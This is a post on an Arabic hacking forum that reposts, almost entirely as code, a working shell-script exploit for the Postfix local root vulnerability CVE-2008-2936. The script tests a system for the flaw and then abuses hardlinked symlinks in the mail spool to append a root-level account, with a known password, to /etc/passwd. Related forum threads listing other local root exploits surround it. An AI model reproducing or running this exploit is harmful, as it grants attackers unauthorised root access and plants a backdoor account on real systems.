قديم 10-02-2008, 03:16 AM رقم المشاركة : 1 (permalink)
معلومات العضو
SubSEven7II
Supervisor-General

الصورة الرمزية SubSEven7II

إحصائية العضو

الانتساب : Mar 2008
رقم العضوية : 102324
المشاركات : 2,091
بمعدل : 8.28 يومياً


SubSEven7II متصل الآن


افتراضي Postfix local root vulnerability

#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
echo "$1"
exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
echo "[*] Postfix seems to be installed"
else
quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
echo "[*] Hardlink to symlink not dereferenced"
rm -rf $writable_dir/pocfix
else
rm -rf $writable_dir/pocfix
quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
echo "[*] Spool dir is writable"
else
quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
rm -f $spool_dir/$user
echo "[*] Mailbox for \"$user\" found. Trying to delete it"

if [ -e $spool_dir/$user ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
rm -f $spool_dir/$useful_link_dst
echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

if [ -e $spool_dir/$useful_link_dst ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
if [ $aliases ] ; then
$postmap -q $user $aliases > /dev/null
if [ $? -eq 0 ] ; then
quit "[!] Mail alias for \"$user\" exists"
fi
fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
quit "[!] Non-Postfix LDA detected"
fi

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
echo "[!] Exploit failed"
else
echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst

# milw0rm.com [2008-08-31]







التوقيع

رد مع اقتباس
رد

مواقع النشر (المفضلة)



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
SCO UnixWare Merge mcd Local Root Exploit zeoos :: Local Root Exploit :: 0 04-04-2008 07:53 PM
SCO UnixWare Reliant HA Local Root Exploit zeoos :: Local Root Exploit :: 0 04-04-2008 07:53 PM
SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit zeoos :: Local Root Exploit :: 0 04-04-2008 07:53 PM
local root 2.6.18-53.1.13.el5 #1 SMP SeABaT منتدى طلبات برامج الهكر 0 02-17-2008 12:20 AM
Bugtraq: [ MDVSA-2008:027 ] - Updated pulseaudio packages fix local root vulnerabilit HACKERS_3006 :: Local Root Exploit :: 0 01-26-2008 08:30 PM

Loading...



 


ترتيب الموقع عالمياً
1 2 3 4 5 6 7 8 9 10 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 dvd,arab.dvd4arab.movies,news,arab,idx,cd,vcd,translation,hot,bew,cool,fun المنتدى العام -منتدى الأدب والفنون -مجلة الديفيدي -منتـدي أدم و حــــ ، ـــواء -منتدى الأذكياء -أجندة الديفيدي -المنتدى الاسلامي العام -المكتبة الاٍسلامية -منتدى الإذاعة والتليفزيون الإسلامى منتدى الأغاني العربية -منتدى روابط عشّـاق المطربيـن -منتدى الأغانى العالمية -منتدى المسلسلات العالمية والعربية -منتدى الفنون والمناقشات السينمائية- منتدى ترجمة الأفلام والمسلسلات منتدى بوليوود(السينما الهندية)-منتدى عالم الأنيمى والكارتون -منتدى تحميل الأفلام العام -منتدى تحميل الأفلامTorrent-منتدى تحميل الأفلام بالروابط المباشرة -منتدى تبادل الافلام منتـدى البرامج والشروحات السينمائية -المنتدى الطبي -المنتدي العلمي العام -المنتدى الهندسي -منتدي العلوم الفضائية و الكونية والفلكية منتـــدى التجـــارييــن منتدى الطبيعة والحياة البرية منتدي المالتي ميديا العام - منتدي الصور والجرافيكس الخاص بالمصارعه الحرة -منتدى روابط المصارعين -منتدي الـ BitTorrent للمصارعة الحره -منتدي المناقشات -إستراحة مصارعة الدي في دي منتدي كمال الاجسام وبناء العضلات -منتدي الرياضة العربية والعالمية -منتدى الكرة المصري -منتدي بطولات الكرة الاوروبية Uefa-منتدى الملتيميديا العام -منتدى الرياضات الاخرى منتدى الهوايات العام -منتدى أسماك وطيور الزينة -منتدى هواة تربية الحيوانات الأليفة -منتدى عالم السيارات -منتدى ألعاب الكمبيوتر -منتدى تحميل الالعاب للكمبيوتر منتدى Consoles-PS2/3-XBoX360-Wii-منتدى تبادل الألعاب - منتدى البرامج -منتدى برامج الحمايه والفايروول -منتدى الهاكر -مـــنتدى عــالم المــاسنجــر وخبــاياه -منتدى خاص بشروح البرامج -منتدى الصيانة وخدمة الأعضاء منتدى الشبكات - منتدى خاص بالبرمجة -منتدى تطوير المواقع و المنتديات -منتدى الكتب الإلكترونية -منتدى المالتيميديا و الجرافيكس العام - منتدى الجوالات العام -منتدى النوكيا المنتدي الفضائي العام -منتدى القنوات والشفرات -منتدي كروت الساتلايت -منتدى أجهزة الستلايت -منتدى الشيرنج العام -منتدى العرض -منتدى الطلب - منتدى الوظائف -منتدى الاستشـارات القـانونية -البورصة المصريةلقطات فيديو مضحكة - عالم محمد فؤاد - شبكة حالا الترفيهية - افلام مجانا - شاهد افلام مجانا - العاب فلاش - منتدى سحر - اغانى مجانا - اغانى - دردشة - العاب فلاش - عيني عينك - Video -خلفيات شاشة - افلام - شات - دردشة - دردشة - دردشه - شاتالمنتديات العامــــــــــة منتدياتنا الاسلامية رمضان 2006 دروس مفيدة سلسلة دروس ايمانية منتديات الدى فى دى العامة قوميتنا ... كل الكلام الجاد جدا التعارف والترحيب والتهانى اخر اخبار السياسة والاقتصاد والمجتمع أحبـــــــــــك ركن الترفيه والتسالى منتديات دى فى دى للافـــــلام Movies - Films قسم الافلام العربية قسم الافلام الاجنبيه طلبات ترجمة الافلام الاجنبيه مسرحيات دى فى دى العربى قسم تحميل الأفلام العربية بروابط مباشرة قسم الأفلام الاجنبية بروابط مباشرة قسم افلام التورنت Torrent Movies كل الاغانى العربى والاجنبى والكليبات قسم الالبومات والاغانى والكليبات قسم الاغانى الشعبى اغانى الزمن الجميل ( اغانى زمااان ) انفرادات قسم الالبومات والاغانى الاجنبى اخر الاخبار معرض الصور والخلفيات صور عجيبة وغريبة صور الفنانين والمشاهير خلفيات الكمبيوتر ومناظر طبيعية قسم صور السيارات واخبارها منتدى كل الاقســـام قسم كل البرامج العامة قسم برامج الصوت والفيديو والجرافيكس قسم الألعـــاب قسم تطوير المواقع والمنتديات قسم الستالايت قسم الخيال والغرائب واللقطات المضحكة قسم الجوالات قسم الجوالات العام قسم برامج الجوالات قسم ثيمات ونغمات الرياضة من كل مكان كرة القدم ... كل الاخبار والاحداث واهم المواضيع مكتبة الميديا والوسائط قسم رياضة المصارعة كل الرياضات المختلفة قسم شباب وبنات كل شئون الفتيات مواقف الجامعة والمدرسة قسم مواهب الاعضاء الاقسام الاادارية فريق عمل الدى فى دى العربى من الأعضاء قسم المواضيع المحذوفة اغانى شعبية شعبى تحميل أفلام عربية جديدة مجانا تحميل أفلام اجنبية مجانا مواضيع محذوفة العاب جوال موبايل ثيمات نغمات للجوال تحميل مجاناموقع الدى فى دى العربى لتحميل أفلام مجانا افلام عربية واجنبية كل الجديد دائما تحميل برامج برنامج مجانا صور فناننين ومطربين


 


ملاحظة : المواضيع الموجودة بالمنتدى ليس بالضرورة تعبر عن رأي إدارة منظمة الأختراق العالمية بل تعبر عن كاتبها

الساعة الآن 03:12 AM.
Powered by: vBulletin Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
مـنـتـديـات مـنـظـمـة الاخـتــراق الـعـالـمـيــه

بدعم وتطوير شركة intercative